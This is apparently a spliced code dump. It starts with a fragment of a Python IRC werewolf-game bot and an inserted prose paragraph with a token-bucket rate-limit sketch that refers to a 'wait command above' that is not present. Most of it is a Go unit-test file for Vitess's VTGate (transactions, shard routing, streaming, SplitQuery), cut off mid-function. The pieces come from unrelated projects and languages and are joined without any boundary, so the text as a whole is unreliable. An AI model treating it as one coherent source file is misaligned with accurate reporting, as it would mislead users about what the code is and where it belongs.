if not (botconfig.DEBUG_MODE and var.DISABLE_DEBUG_MODE_REAPER):
# DEATH TO IDLERS!
from src.wolfgame import reaper
reapertimer = threading.Thread(None, reaper, args=(wrapper.client, var.GAME_ID))
reapertimer.daemon = True
reapertimer.start()
def _command_disabled(var, wrapper, message):
wrapper.send(messages["command_disabled_admin"])
@handle_error
def expire_start_votes(var, channel):
# Should never happen as the timer is removed on game start, but just to be safe
if var.PHASE != "join":
return
with var.WARNING_LOCK:
START_VOTES.clear()
channel.send(messages["start_expired"])
@event_listener("reset")
def on_reset(evt, var):
global RESTART_TRIES, WAIT_TOKENS, WAIT_LAST
LAST_START.clear()
LAST_WAIT.clear()
START_VOTES.clear()
RESTART_TRIES = 0
WAIT_TOKENS = 0
WAIT_LAST = 0
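The wait command above rate-limits with a token bucket: tokens accrue at one per WAIT_TB_DELAY seconds up to a WAIT_TB_BURST cap, and each !wait spends one. A standalone sketch of that accounting (the class and the demo values are assumptions; the fields mirror WAIT_TOKENS and WAIT_LAST above):

import time

class WaitBucket:
    def __init__(self, delay, burst):
        self.delay = delay      # seconds per token, like var.WAIT_TB_DELAY
        self.burst = burst      # token cap, like var.WAIT_TB_BURST
        self.tokens = 0.0       # like WAIT_TOKENS
        self.last = 0.0         # like WAIT_LAST; the first call fills the bucket

    def try_spend(self):
        now = time.time()
        self.tokens = min(self.tokens + (now - self.last) / self.delay, self.burst)
        self.last = now
        if self.tokens < 1:
            return False        # caller should reply with command_ratelimited
        self.tokens -= 1
        return True

bucket = WaitBucket(delay=240, burst=3)
print(bucket.try_spend())  # True: the elapsed-time credit is capped at burst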
vtgate_test.go | // Copyright 2012, Google Inc. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package vtgate
import (
"encoding/hex"
"fmt"
"math"
"reflect"
"strings"
"testing"
"github.com/golang/protobuf/proto"
"github.com/youtube/vitess/go/sqltypes"
"github.com/youtube/vitess/go/vt/discovery"
"github.com/youtube/vitess/go/vt/key"
"github.com/youtube/vitess/go/vt/tabletserver/querytypes"
"github.com/youtube/vitess/go/vt/tabletserver/sandboxconn"
"github.com/youtube/vitess/go/vt/tabletserver/tabletconn"
"github.com/youtube/vitess/go/vt/topo"
"github.com/youtube/vitess/go/vt/vterrors"
"github.com/youtube/vitess/go/vt/vtgate/gateway"
"golang.org/x/net/context"
querypb "github.com/youtube/vitess/go/vt/proto/query"
topodatapb "github.com/youtube/vitess/go/vt/proto/topodata"
vtgatepb "github.com/youtube/vitess/go/vt/proto/vtgate"
vtrpcpb "github.com/youtube/vitess/go/vt/proto/vtrpc"
)
// This file uses the sandbox_test framework.
var hcVTGateTest *discovery.FakeHealthCheck
var executeOptions = &querypb.ExecuteOptions{
IncludedFields: querypb.ExecuteOptions_TYPE_ONLY,
}
func init() {
getSandbox(KsTestUnsharded).VSchema = `
{
"Sharded": false,
"Tables": {
"t1": {}
}
}
`
hcVTGateTest = discovery.NewFakeHealthCheck()
*transactionMode = "multi"
Init(context.Background(), hcVTGateTest, topo.Server{}, new(sandboxTopo), "aa", 10, nil)
}
func TestVTGateBegin(t *testing.T) {
save := rpcVTGate.transactionMode
defer func() {
rpcVTGate.transactionMode = save
}()
rpcVTGate.transactionMode = TxSingle
got, err := rpcVTGate.Begin(context.Background(), true)
if err != nil {
t.Error(err)
}
wantSession := &vtgatepb.Session{
InTransaction: true,
SingleDb: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
_, err = rpcVTGate.Begin(context.Background(), false)
wantErr := "multi-db transaction disallowed"
if err == nil || err.Error() != wantErr {
t.Errorf("Begin(multi): %v, want %s", err, wantErr)
}
rpcVTGate.transactionMode = TxMulti
got, err = rpcVTGate.Begin(context.Background(), true)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
SingleDb: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
got, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
rpcVTGate.transactionMode = TxTwoPC
got, err = rpcVTGate.Begin(context.Background(), true)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
SingleDb: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
got, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
}
func TestVTGateCommit(t *testing.T) {
save := rpcVTGate.transactionMode
defer func() {
rpcVTGate.transactionMode = save
}()
session := &vtgatepb.Session{
InTransaction: true,
}
rpcVTGate.transactionMode = TxSingle
err := rpcVTGate.Commit(context.Background(), true, session)
wantErr := "2pc transaction disallowed"
if err == nil || err.Error() != wantErr {
t.Errorf("Begin(multi): %v, want %s", err, wantErr)
}
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err != nil {
t.Error(err)
}
rpcVTGate.transactionMode = TxMulti
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), true, session)
if err == nil || err.Error() != wantErr {
t.Errorf("Begin(multi): %v, want %s", err, wantErr)
}
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err != nil {
t.Error(err)
}
rpcVTGate.transactionMode = TxTwoPC
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), true, session)
if err != nil {
t.Error(err)
}
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err != nil {
t.Error(err)
}
}
func TestVTGateRollbackNil(t *testing.T) {
err := rpcVTGate.Rollback(context.Background(), nil)
if err != nil {
t.Error(err)
}
}
func TestVTGateExecute(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
qr, err := rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: KsTestUnsharded,
Shard: "0",
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
session, err = rpcVTGate.Begin(context.Background(), false)
rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
rpcVTGate.Rollback(context.Background(), session)
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
}
func TestVTGateExecuteWithKeyspace(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
qr, err := rpcVTGate.Execute(context.Background(),
"select id from none",
nil,
KsTestUnsharded,
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from none",
nil,
"aa",
topodatapb.TabletType_MASTER,
nil,
false,
nil)
want := "keyspace aa not found in vschema, vtgate: "
if err == nil || err.Error() != want {
t.Errorf("Execute: %v, want %s", err, want)
}
}
func TestVTGateExecuteShards(t *testing.T) {
ks := "TestVTGateExecuteShards"
shard := "0"
createSandbox(ks)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard, topodatapb.TabletType_REPLICA, true, 1, nil)
qr, err := rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_REPLICA,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_REPLICA,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard,
TabletType: topodatapb.TabletType_REPLICA,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
session, err = rpcVTGate.Begin(context.Background(), false)
rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_REPLICA,
session,
false,
nil)
rpcVTGate.Rollback(context.Background(), session)
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
}
func TestVTGateExecuteKeyspaceIds(t *testing.T) {
ks := "TestVTGateExecuteKeyspaceIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
qr, err := rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if execCount := sbc1.ExecCount.Get(); execCount != 1 {
t.Errorf("want 1, got %v\n", execCount)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution in transaction
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard1,
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc1.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
// Test for multiple shards
qr, err = rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}, {0x30}},
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("ExecuteKeyspaceIds failed: %v", err)
}
if qr.RowsAffected != 2 {
t.Errorf("want 2, got %v", qr.RowsAffected)
}
}
func TestVTGateExecuteKeyRanges(t *testing.T) {
ks := "TestVTGateExecuteKeyRanges"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
qr, err := rpcVTGate.ExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if execCount := sbc1.ExecCount.Get(); execCount != 1 {
t.Errorf("want 1, got %v\n", execCount)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution in transaction
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
qr, err = rpcVTGate.ExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Errorf("want nil, got %v", err)
}
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard1,
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc1.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %v", commitCount)
}
// Test for multiple shards
qr, err = rpcVTGate.ExecuteKeyRanges(context.Background(), "query",
nil,
ks,
[]*topodatapb.KeyRange{{Start: []byte{0x10}, End: []byte{0x30}}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("ExecuteKeyRanges failed: %v", err)
}
if qr.RowsAffected != 2 {
t.Errorf("want 2, got %v", qr.RowsAffected)
}
}
func TestVTGateExecuteEntityIds(t *testing.T) {
ks := "TestVTGateExecuteEntityIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
qr, err := rpcVTGate.ExecuteEntityIds(context.Background(),
"query",
nil,
ks,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if execCount := sbc1.ExecCount.Get(); execCount != 1 {
t.Errorf("want 1, got %v\n", execCount)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution in transaction
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.ExecuteEntityIds(context.Background(),
"query",
nil,
ks,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
},
topodatapb.TabletType_MASTER,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard1,
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc1.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
// Test for multiple shards
qr, err = rpcVTGate.ExecuteEntityIds(context.Background(), "query",
nil,
ks,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
{
Type: sqltypes.VarBinary,
Value: []byte("id2"),
KeyspaceId: []byte{0x30},
},
},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("ExecuteEntityIds failed: %v", err)
}
if qr.RowsAffected != 2 {
t.Errorf("want 2, got %v", qr.RowsAffected)
}
}
func TestVTGateExecuteBatchShards(t *testing.T) {
ks := "TestVTGateExecuteBatchShards"
createSandbox(ks)
shard1 := "-20"
shard2 := "20-40"
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
qrl, err := rpcVTGate.ExecuteBatchShards(context.Background(),
[]*vtgatepb.BoundShardQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if len(qrl) != 2 {
t.Errorf("want 2, got %v", len(qrl))
}
if qrl[0].RowsAffected != 2 {
t.Errorf("want 2, got %v", qrl[0].RowsAffected)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
rpcVTGate.ExecuteBatchShards(context.Background(),
[]*vtgatepb.BoundShardQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}},
topodatapb.TabletType_MASTER,
false,
session,
nil)
if len(session.ShardSessions) != 2 {
t.Errorf("want 2, got %d", len(session.ShardSessions))
}
}
func TestVTGateExecuteBatchKeyspaceIds(t *testing.T) {
ks := "TestVTGateExecuteBatchKeyspaceIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
kid10 := []byte{0x10}
kid30 := []byte{0x30}
qrl, err := rpcVTGate.ExecuteBatchKeyspaceIds(context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if len(qrl) != 2 {
t.Errorf("want 2, got %v", len(qrl))
}
if qrl[0].RowsAffected != 2 {
t.Errorf("want 2, got %v", qrl[0].RowsAffected)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
rpcVTGate.ExecuteBatchKeyspaceIds(context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}},
topodatapb.TabletType_MASTER,
false,
session,
nil)
if len(session.ShardSessions) != 2 {
t.Errorf("want 2, got %d", len(session.ShardSessions))
}
}
func TestVTGateStreamExecute(t *testing.T) {
ks := KsTestUnsharded
shard := "0"
createSandbox(ks)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard, topodatapb.TabletType_MASTER, true, 1, nil)
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
}
func TestVTGateStreamExecuteKeyspaceIds(t *testing.T) {
ks := "TestVTGateStreamExecuteKeyspaceIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution - multiple keyspaceids in single shard
qrs = nil
err = rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}, {0x15}},
topodatapb.TabletType_MASTER,
nil,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want = []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
// Test for successful execution - multiple keyspaceids in multiple shards
err = rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}, {0x30}},
topodatapb.TabletType_MASTER,
nil,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
}
func TestVTGateStreamExecuteKeyRanges(t *testing.T) {
ks := "TestVTGateStreamExecuteKeyRanges"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution - multiple shards
err = rpcVTGate.StreamExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{Start: []byte{0x10}, End: []byte{0x40}}},
topodatapb.TabletType_MASTER,
nil,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
}
func TestVTGateStreamExecuteShards(t *testing.T) {
ks := "TestVTGateStreamExecuteShards"
shard := "0"
createSandbox(ks)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
}
func TestVTGateSplitQuerySharded(t *testing.T) {
keyspace := "TestVTGateSplitQuery"
keyranges, err := key.ParseShardingSpec(DefaultShardSpec)
if err != nil {
t.Fatalf("got: %v, want: nil", err)
}
createSandbox(keyspace)
hcVTGateTest.Reset()
port := int32(1001)
for _, kr := range keyranges {
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", port, keyspace, key.KeyRangeString(kr), topodatapb.TabletType_RDONLY, true, 1, nil)
port++
}
sql := "select col1, col2 from table"
bindVars := map[string]interface{}{"bv1": nil}
splitColumns := []string{"sc1", "sc2"}
algorithm := querypb.SplitQueryRequest_FULL_SCAN
type testCaseType struct {
splitCount int64
numRowsPerQueryPart int64
}
testCases := []testCaseType{
{splitCount: 100, numRowsPerQueryPart: 0},
{splitCount: 0, numRowsPerQueryPart: 123},
}
for _, testCase := range testCases {
splits, err := rpcVTGate.SplitQuery(
context.Background(),
keyspace,
sql,
bindVars,
splitColumns,
testCase.splitCount,
testCase.numRowsPerQueryPart,
algorithm)
if err != nil {
t.Errorf("got %v, want: nil. testCase: %+v", err, testCase)
}
// Total number of splits should be number of shards as our sandbox returns a single split
// for its fake implementation of SplitQuery.
if len(keyranges) != len(splits) {
t.Errorf("wrong number of splits, got %+v, want %+v. testCase:\n%+v",
len(splits), len(keyranges), testCase)
}
actualSqlsByKeyRange := map[string][]string{}
for _, split := range splits {
if split.KeyRangePart.Keyspace != keyspace {
t.Errorf("wrong keyspace, got \n%+v, want \n%+v. testCase:\n%+v",
split.KeyRangePart.Keyspace, keyspace, testCase)
}
if len(split.KeyRangePart.KeyRanges) != 1 {
t.Errorf("wrong number of keyranges, got \n%+v, want \n%+v. testCase:\n%+v",
1, len(split.KeyRangePart.KeyRanges), testCase)
}
kr := key.KeyRangeString(split.KeyRangePart.KeyRanges[0])
actualSqlsByKeyRange[kr] = append(actualSqlsByKeyRange[kr], split.Query.Sql)
}
expectedSqlsByKeyRange := map[string][]string{}
for _, kr := range keyranges {
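// The fake SplitQuery implementation echoes its parameters back, so each
// shard is expected to report ceil(splitCount / numShards) as its split count.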
perShardSplitCount := int64(math.Ceil(float64(testCase.splitCount) / float64(len(keyranges))))
shard := key.KeyRangeString(kr)
expectedSqlsByKeyRange[shard] = []string{
fmt.Sprintf(
"query:%v, splitColumns:%v, splitCount:%v,"+
" numRowsPerQueryPart:%v, algorithm:%v, shard:%v",
querytypes.BoundQuery{Sql: sql, BindVariables: bindVars},
splitColumns,
perShardSplitCount,
testCase.numRowsPerQueryPart,
algorithm,
shard,
),
}
}
